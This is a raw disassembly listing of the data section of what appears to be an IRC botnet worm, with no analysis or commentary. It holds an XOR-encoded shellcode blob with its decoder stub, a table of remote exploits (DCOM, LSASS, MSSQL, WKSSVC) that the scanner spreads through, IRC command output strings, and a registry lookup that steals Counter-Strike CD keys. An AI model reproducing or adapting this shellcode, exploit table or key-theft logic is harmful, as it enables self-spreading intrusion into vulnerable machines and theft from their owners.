unk_4282B8 db 2 ; DATA XREF: sub_405A6A+3F8�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 68h, 2 dup(74h)
db 70h ; p
db 64h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aErrorServerFai db 'Error: server failed, returned: <%d>.',0
align 4
asc_4282FC db 0Dh,0Ah,0 ; DATA XREF: sub_405A6A+2CF�o
align 10h
asc_428300: ; DATA XREF: sub_405A6A+293�o
; sub_40F6F1+A8�o ...
unicode 0, < >,0
aGet db 'GET ',0 ; DATA XREF: sub_405A6A+269�o
align 4
aHttp1_0200Ok_0 db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_405EC5+F6�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Content-Length: %i',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHttp1_0200OkSe db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_405EC5+D3�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: sub_405EC5+97�o
; sub_40BDAD+1AE�o
align 4
aDddDdMmmYyyy db 'ddd, dd MMM yyyy',0 ; DATA XREF: sub_405EC5+83�o
align 4
aApplicationOct db 'application/octet-stream',0 ; DATA XREF: sub_405EC5:loc_405F2A�o
align 4
aTextHtml db 'text/html',0 ; DATA XREF: sub_405EC5+5E�o
align 10h
unk_428520 db 2 ; DATA XREF: sub_406047+28F�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 68h, 2 dup(74h)
db 70h ; p
db 64h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToStartW db 'Failed to start worker thread, error: <%d>.',0
unk_428568 db 2 ; DATA XREF: sub_406047+20B�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 68h, 2 dup(74h)
db 70h ; p
db 64h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aWorkerThreadOf db 'Worker thread of server thread: %d.',0
asc_4285A8: ; DATA XREF: sub_406047+157�o
unicode 0, <*>,0
asc_4285AC: ; DATA XREF: sub_406047+FB�o
; sub_4062F7+29�o ...
dw 0Ah
unicode 0, <>,0
aSS_2 db '%s%s',0 ; DATA XREF: sub_406047+EA�o
; sub_4062F7+4CA�o ...
align 4
aS_2 db '\%s',0 ; DATA XREF: sub_406047+2F�o
aFoundIFilesAnd db 'Found: %i Files and %i Directories',0Dh,0Ah,0
; DATA XREF: sub_4062F7+64E�o
align 4
aTrTdColspan3_0 db '<TR>',0Dh,0Ah ; DATA XREF: sub_4062F7+633�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah
db '</TABLE>',0Dh,0Ah
db '</BODY>',0Dh,0Ah
db '</HTML>',0Dh,0Ah,0
align 4
aPrivmsgSFoundS db 'PRIVMSG %s :Found %s Files and %s Directories',0Ah,0
; DATA XREF: sub_4062F7+618�o
align 4
a31s21sIBytes db '%-31s %-21s (%i bytes)',0Dh,0Ah,0 ; DATA XREF: sub_4062F7+589�o
align 4
aTdTdWidthDCo_0 db '</TD>',0Dh,0Ah ; DATA XREF: sub_4062F7+561�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
aCodeSCodeA_0 db '"><CODE>%s</CODE></A>',0 ; DATA XREF: sub_4062F7:loc_40680F�o
align 4
aCode_30sGtCode db '"><CODE>%.30s></CODE></A>',0 ; DATA XREF: sub_4062F7+511�o
align 4
aPrivmsgS31s2_0 db 'PRIVMSG %s :%-31s %-21s (%s bytes)',0Ah,0 ; DATA XREF: sub_4062F7+471�o
align 10h
a31s21s db '%-31s %-21s',0Dh,0Ah,0 ; DATA XREF: sub_4062F7+434�o
align 10h
aTdTdWidthDCode db '</TD>',0Dh,0Ah ; DATA XREF: sub_4062F7+401�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aCodeSCodeA db '"><CODE>%s/</CODE></A>',0 ; DATA XREF: sub_4062F7:loc_4066B9�o
align 10h
aCode_29sGtCode db '"><CODE>%.29s>/</CODE></A>',0 ; DATA XREF: sub_4062F7+3BB�o
align 10h
aSS db '%s%s/',0 ; DATA XREF: sub_4062F7+374�o
align 4
aTrTdWidthDAHre db '<TR>',0Dh,0Ah ; DATA XREF: sub_4062F7+330�o
; sub_4062F7+486�o
db '<TD WIDTH="%d"><A HREF="',0
align 4
aPrivmsgS31s21s db 'PRIVMSG %s :%-31s %-21s',0Ah,0 ; DATA XREF: sub_4062F7+30E�o
align 4
aS_0 db '<%s>',0 ; DATA XREF: sub_4062F7+2E4�o
; sub_4062F7+413�o
align 4
a2_2d2_2d4d2_2d db '%2.2d/%2.2d/%4d %2.2d:%2.2d %s',0 ; DATA XREF: sub_4062F7+2BA�o
aAm db 'AM',0 ; DATA XREF: sub_4062F7+290�o
align 10h
aPm db 'PM',0 ; DATA XREF: sub_4062F7+285�o
align 4
a__ db '..',0 ; DATA XREF: sub_4062F7+232�o
align 4
aTrTdColspan3AH db '<TR>',0Dh,0Ah ; DATA XREF: sub_4062F7+1C0�o
db '<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></T'
db 'D>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aSearchingForS db 'Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_4062F7+147�o
aTrTdColspan3Hr db '<TR>',0Dh,0Ah ; DATA XREF: sub_4062F7+12B�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aTrTdWidthDCode db '<TR>',0Dh,0Ah ; DATA XREF: sub_4062F7+F7�o
db '<TD WIDTH="%d"><CODE>Name</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aH1IndexOfSH1Ta db '<H1>Index of %s</H1>',0Dh,0Ah ; DATA XREF: sub_4062F7+AD�o
db '<TABLE BORDER="0">',0Dh,0Ah,0
align 4
aHtmlHeadTitleI db '<HTML>',0Dh,0Ah ; DATA XREF: sub_4062F7+78�o
db '<HEAD>',0Dh,0Ah
db '<TITLE>Index of %s</TITLE>',0Dh,0Ah
db '</HEAD>',0Dh,0Ah
db '<BODY>',0Dh,0Ah,0
align 4
aPrivmsgSSearch db 'PRIVMSG %s :Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_4062F7+4B�o
aSSHttp1_1Refer db '%s %s HTTP/1.1',0Ah ; DATA XREF: sub_406A64+8F�o
db 'Referer: %s',0Ah
db 'Host: %s',0Ah
db 'Connection: close',0Ah
db 0Ah,0
dword_428A5C dd 4000500h, 7868746Bh, 0dword_428A68 dd 7A026E02h, 201F6D1Fh, 74667428h, 1F702E70h, 29671F6Ch
; DATA XREF: sub_406B85+47F�o
dd 0BBBB0220h, 74202002h, 736E6172h, 20726566h, 20206F74h
dd 20207325h, 75731F02h, 73656363h, 6C756673h, 6320796Ch
dd 6C706D6Fh, 64657465h, 202C021Fh, 6F666E69h, 2528203Ah
dd 2E2973h
unk_428ABC db 2 ; DATA XREF: sub_406B85+3B6�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFileNotFoundSS db ' File not found: %s (%s).',0
dword_428AF0 dd 1000500h, 656C6946h, 746F4E20h, 756F4620h, 646Eh
; DATA XREF: sub_406B85+399�o
dword_428B04 dd 7A026E02h, 201F6D1Fh, 74667428h, 1F702E70h, 29671F6Ch
; DATA XREF: sub_406B85+33E�o
dd 0BBBB0220h, 74202002h, 736E6172h, 20726566h, 20206F74h
dd 20207325h, 65621F02h, 6E6E6967h, 1F676E69h, 69202C02h
dd 3A6F666Eh, 73252820h, 2E29h
unk_428B4C db 2 ; DATA XREF: sub_406B85+15A�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToOpenFi db ' Failed to open file: %s.',0
unk_428B80 db 2 ; DATA XREF: sub_406B85+6A�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aErrorSocketF_2 db ' Error: socket() failed, returned: <%d>.',0
align 4
aOctet db 'octet',0 ; DATA XREF: sub_406B85+F�o
align 10h
aDcom135_0 db 'dcom135',0 ; DATA XREF: sub_4076D2+164�o
db 2 dup(0)
aDcom135 db 'Dcom135',0 ; DATA XREF: sub_40381E+16D�o
; sub_403E35+2DD�o ...
align 4
dd 5 dup(0)
dword_428BF8 dd 87h ; sub_40F6F1+31C4�r ...
off_428BFC dd offset sub_403E35 ; DATA XREF: sub_4076D2+1E6�r
dword_428C00 dd 0 ; sub_40381E+1C2�r ...
dword_428C04 dd 1 dword_428C08 dd 0 aDcom445 db 'dcom445',0
dd 63440000h, 34346D6Fh, 35h, 5 dup(0)
dd 1BDh, 403E35h, 0
dd 1, 0
aDcom1025 db 'dcom1025',0
align 2
aDcom1025_0 db 'Dcom1025',0
align 4
dd 5 dup(0)
dd 401h, 403E35h, 0
dd 1, 0
aDcass db 'dcass',0
align 4
dd 63640000h, 737361h, 6 dup(0)
dd 1BDh, 4039EEh, 0
dd 2 dup(1), 7361736Ch, 34345F73h, 736C0035h, 5F737361h
dd 353434h, 5 dup(0)
dd 1BDh, 404737h, 0
dd 2 dup(1), 7361736Ch, 33315F73h, 736C0035h, 5F737361h
dd 353331h, 5 dup(0)
dd 87h, 404737h, 0
dd 2 dup(1), 7361736Ch, 33315F73h, 736C0039h, 5F737361h
dd 393331h, 5 dup(0)
dd 8Bh, 404737h, 0
dd 2 dup(1), 61736C63h, 7373h, 6C630000h, 73736173h, 6 dup(0)
dd 1BDh, 40381Eh, 0
dd 2 dup(1), 6C31736Ch, 73h, 736C0000h, 736C31h, 6 dup(0)
dd 1BDh, 404911h, 0
dd 2 dup(1), 7173736Dh, 6Ch, 736D0000h, 6C7173h, 6 dup(0)
dd 599h, 404969h, 0
dd 2 dup(1), 7361736Dh, 73h, 736D0000h, 737361h, 6 dup(0)
dd 599h, 404C15h, 0
dd 2 dup(1), 53534B57h, 454356h, 4B570000h, 43565353h
dd 45h, 5 dup(0)
dd 87h, 4052BCh, 0
dd 2 dup(1), 53534B57h, 4F4356h, 4B570000h, 43565353h
dd 4Fh, 5 dup(0)
dd 87h, 405306h, 0 ; CODE XREF: sub_428F1A:loc_428F2F�j
dd 2 dup(1), 0Fh dup(0)
; ---------------------------------------------------------------------------
jmp short loc_428F2A
; =============== S U B R O U T I N E =======================================
sub_428F1A proc near ; CODE XREF: sub_428F1A:loc_428F2A�p
pop edx
dec edx
xor ecx, ecx
mov cx, 166h
loc_428F22: ; CODE XREF: sub_428F1A+C�j
xor byte ptr [edx+ecx], 99h
loop loc_428F22
jmp short loc_428F2F
; ---------------------------------------------------------------------------
loc_428F2A: ; CODE XREF: ___:00428F18�j
call sub_428F1A
loc_428F2F: ; CODE XREF: sub_428F1A+E�j
jo short near ptr dword_428EC8+2
cwde
cdq
cdq
retn
sub_428F1A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 21h, 95h, 69h
dd 9912E664h, 3485E912h, 1291D912h, 0A5EA1241h, 0EF126A9Ah
dd 126A9AE1h, 629AB9E7h, 0AA8DD712h, 0C8CECF74h, 629AA612h
dd 97F36B12h, 0ED3F6AC0h, 1AC6C091h, 7BDC9D5Eh, 0C7C6C070h
dd 0DF125412h, 485A9ABDh, 0AA589A78h, 9112FF50h, 9A85DF12h
dd 9B78585Ah, 9912589Ah, 63125A9Ah, 5F1A6E12h, 0F3491297h
dd 0E571C09Ah, 1A999999h, 0CFCB945Fh, 0C365CE66h, 9DF34112h
dd 99F071C0h, 0C9C99999h, 98F3C9C9h, 0CE669BF3h, 5E411269h
dd 9E999B9Eh, 1059AA24h, 89F39DDEh, 0CE66CACEh, 0CA98F36Dh
dd 0C961CE66h, 0CE66CAC9h, 0DD751A65h, 42AA6D12h, 10C089F3h
dd 627B1785h, 10A1DF10h, 0DF10A5DFh, 0B5DF5ED9h, 99999898h
dd 0C989DE14h, 0CACACACFh, 0CACA98F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0CAC9A5DEh, 0C97DCE66h, 0AA71CE66h, 591C3559h, 0CBC860ECh
dd 4B66CACFh, 7B32C0C3h, 5A59AA77h, 66676271h, 0EDFCDE66h
dd 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh, 0F8FCEBDAh, 0EBC9FCEDh
dd 0EAFCFAF6h, 0DC99D8EAh, 0C9EDF0E1h, 0FCFAF6EBh, 0D599EAEAh
dd 0D5FDF8F6h, 0F8EBFBF0h, 99D8E0EBh, 0C6ABEAEEh, 0CE99ABAAh
dd 0F6CAD8CAh, 0EDFCF2FAh, 0F0FB99D8h, 0F599FDF7h, 0FCEDEAF0h
dd 0FAF899F7h, 0EDE9FCFAh, 99h
aTotalDInS_ db ' Total: %d in %s.',0 ; DATA XREF: sub_40707C+81�o
align 4
aSD db ' %s: %d,',0 ; DATA XREF: sub_40707C+42�o
align 4
unk_4290B8 db 2 ; DATA XREF: sub_40707C+11�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aExploitStatist db ' Exploit Statistics:',0
align 4
unk_4290EC db 2 ; DATA XREF: sub_407146+42�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aScanNotActive_ db ' Scan not active.',0
unk_42911C db 2 ; DATA XREF: sub_407146+2C�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aCurrentIpS_ db ' Current IP: %s.',0
align 4
unk_42914C db 2 ; DATA XREF: sub_4071BD+36F�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 68h, 2 dup(74h)
db 70h ; p
db 64h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToStartS db 'Failed to start server, error: <%d>.',0
align 10h
unk_429190 db 2 ; DATA XREF: sub_4071BD+307�o
; sub_40F6F1+5734�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 68h, 2 dup(74h)
db 70h ; p
db 64h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aServerListenin db 'Server listening on IP: %s:%d, Directory: %s\.',0
align 4
dword_4291DC dd 7A026E02h, 201F6D1Fh, 70746628h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_4071BD+267�o
dd 2BBBB02h
aFailedToStar_0 db ' Failed to start server, error: <%d>.',0
align 4
dword_42921C dd 7A026E02h, 201F6D1Fh, 70746628h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_4071BD+1FA�o
dd 2BBBB02h
aServerStartedO db ' Server started on Port: %d, File: %s, Request: %s.',0
align 4
unk_42926C db 2 ; DATA XREF: sub_4071BD+149�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStar_1 db ' Failed to start server, error: <%d>.',0
unk_4292AC db 2 ; DATA XREF: sub_4071BD+DB�o
; sub_40F6F1+55B7�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aServerStarte_0 db ' Server started on Port: %d, File: %s, Request: %s.',0
align 4
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_407599+38�o
; sub_40AFAB+46�o
unk_429308 db 2 ; DATA XREF: sub_4076D2+EB�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aIpSPortDIsOpen db ' IP: %s, Port %d is open.',0
unk_429340 db 2 ; DATA XREF: sub_4076D2+93�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aIpSDScanThread db ' IP: %s:%d, Scan thread: %d, Sub-thread: %d.',0
align 4
unk_42938C db 2 ; DATA XREF: sub_4078E6+1CE�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFinishedAtSDAf db ' Finished at %s:%d after %d minute(s) of scanning.',0
align 10h
unk_4293E0 db 2 ; DATA XREF: sub_4078E6+173�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStar_2 db ' Failed to start worker thread, error: <%d>.',0
align 4
unk_42942C db 2 ; DATA XREF: sub_4078E6+103�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSDScanThreadDS db ' %s:%d, Scan thread: %d, Sub-thread: %d.',0
align 4
unk_429474 db 2 ; DATA XREF: sub_4078E6+87�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToInitia db ' Failed to initialize critical section.',0
align 4
unk_4294BC db 2 ; DATA XREF: sub_407B45+156�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 65h, 64h
db 69h ; i
db 72h, 65h, 63h
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStartC db ' Failed to start client thread, error: <%d>.',0
unk_429508 db 2 ; DATA XREF: sub_407B45+E1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 65h, 64h
db 69h ; i
db 72h, 65h, 63h
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aClientConnecti db ' Client connection from IP: %s:%d, Server thread: %d.',0
align 10h
unk_429560 db 2 ; DATA XREF: ___:00407E77�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 65h, 64h
db 69h ; i
db 72h, 65h, 63h
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStar_3 db ' Failed to start connection thread, error: <%d>.',0
unk_4295B0 db 2 ; DATA XREF: ___:00407DAE�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 65h, 64h
db 69h ; i
db 72h, 65h, 63h
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aClientConnec_0 db ' Client connection to IP: %s:%d, Server thread: %d.',0
align 4
unk_429604 db 2 ; DATA XREF: sub_407F51+1B2�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToStar_4 db 'Failed to start server on Port %d.',0
align 4
unk_429644 db 2 ; DATA XREF: sub_407F51+18F�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToStar_5 db 'Failed to start client thread, error: <%d>.',0
unk_42968C db 2 ; DATA XREF: sub_407F51+114�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aClientConnec_1 db 'Client connection from IP: %s:%d, Server thread: %d.',0
align 10h
unk_4296E0 db 2 ; DATA XREF: sub_407F51+A8�o
; sub_40F6F1+5F61�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aServerStarte_1 db 'Server started on: %s:%d.',0
align 4
unk_429718 db 2 ; DATA XREF: sub_407F51+3FE�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aErrorFailedToC db 'Error: Failed to connect to target, returned: <%d>.',0
unk_429768 db 2 ; DATA XREF: sub_407F51+38F�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aErrorFailedToO db 'Error: Failed to open socket(), returned: <%d>.',0
unk_4297B4 db 2 ; DATA XREF: sub_407F51+2F7�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aAuthentication db 'Authentication failed. Remote userid: %s != %s.',0
aDisplay db 'DISPLAY',0 ; DATA XREF: sub_40851A+11�o
aWindow db 'Window',0 ; DATA XREF: sub_408755+23�o
; sub_40894E+26�o
align 10h
dd 80000001h
off_429814 dd offset aSoftwareValveC ; DATA XREF: sub_408B8D+C�r
; sub_408B8D+21�o
; "Software\\Valve\\CounterStrike\\Settings"
dd offset aCdkey ; "CDKey"
dd offset aCounterStrikeR ; "Counter-Strike (Retail)"
dword_429820 dd 2 dup(0) dd 80000001h, 42A9A8h, 42A99Ch, 42A98Ch, 2 dup(0)
dd 80000001h, 42A96Ch, 42A968h, 42A954h, 2 dup(0)
dd 80000001h, 42A930h, 42A968h, 42A924h, 2 dup(0)
dd 80000001h, 42A900h, 42A8F8h, 42A8E4h, 2 dup(0)
dd 80000001h, 42A8D0h, 42A8C0h, 42A8A4h, 2 dup(0)
dd 80000001h, 42A860h, 42A9E8h, 42A84Ch, 2 dup(0)
dd 80000002h, 42A820h, 42A814h, 42A7F4h, 2 dup(0)
dd 80000002h, 42A7C0h, 42A9E8h, 42A7A8h, 2 dup(0)
dd 80000002h, 42A774h, 42A9E8h, 42A75Ch, 2 dup(0)
dd 80000002h, 42A744h, 42A9E8h, 42A72Ch, 2 dup(0)
dd 80000002h, 42A6F0h, 43C63Ch, 42A6E0h, 2 dup(0)
dd 80000002h, 42A6A8h, 43C63Ch, 42A694h, 2 dup(0)
dd 80000002h, 42A648h, 43C63Ch, 42A628h, 2 dup(0)
dd 80000002h, 42A5D8h, 43C63Ch, 42A5ACh, 2 dup(0)
dd 80000002h, 42A570h, 43C63Ch, 42A55Ch, 2 dup(0)
dd 80000002h, 42A524h, 43C63Ch, 42A514h, 2 dup(0)
dd 80000002h, 42A4C4h, 43C63Ch, 42A498h, 2 dup(0)
dd 80000002h, 42A458h, 43C63Ch, 42A43Ch, 2 dup(0)
dd 80000002h, 42A40Ch, 43C63Ch, 42A3ECh, 2 dup(0)
dd 80000002h, 42A3B0h, 43C63Ch, 42A39Ch, 2 dup(0)
dd 80000002h, 42A354h, 43C63Ch, 42A334h, 2 dup(0)
dd 80000002h, 42A2E0h, 43C63Ch, 42A2B0h, 2 dup(0)
dd 80000002h, 42A260h, 43C63Ch, 42A234h, 2 dup(0)
dd 80000002h, 42A1F4h, 42A1ECh, 42A1CCh, 2 dup(0)
dd 80000002h, 42A188h, 43C63Ch, 42A16Ch, 2 dup(0)
dd 80000002h, 42A120h, 43C63Ch, 42A0FCh, 2 dup(0)
dd 80000002h, 42A0C8h, 43C63Ch, 42A0BCh, 2 dup(0)
dd 80000002h, 42A088h, 43C63Ch, 42A07Ch, 2 dup(0)
dd 80000002h, 42A048h, 43C63Ch, 42A03Ch, 2 dup(0)
dd 80000002h, 42A008h, 43C63Ch, 429FFCh, 2 dup(0)
dd 80000002h, 429FC0h, 43C63Ch, 429FACh, 2 dup(0)
dd 80000002h, 429F70h, 43C63Ch, 429F5Ch, 2 dup(0)
dd 80000002h, 429F2Ch, 42A9E8h, 429F10h, 2 dup(0)
dd 80000002h, 429EF0h, 429EE8h, 429EC4h, 2 dup(0)
dd 80000002h, 429EA8h, 429EE8h, 429E88h, 2 dup(0)
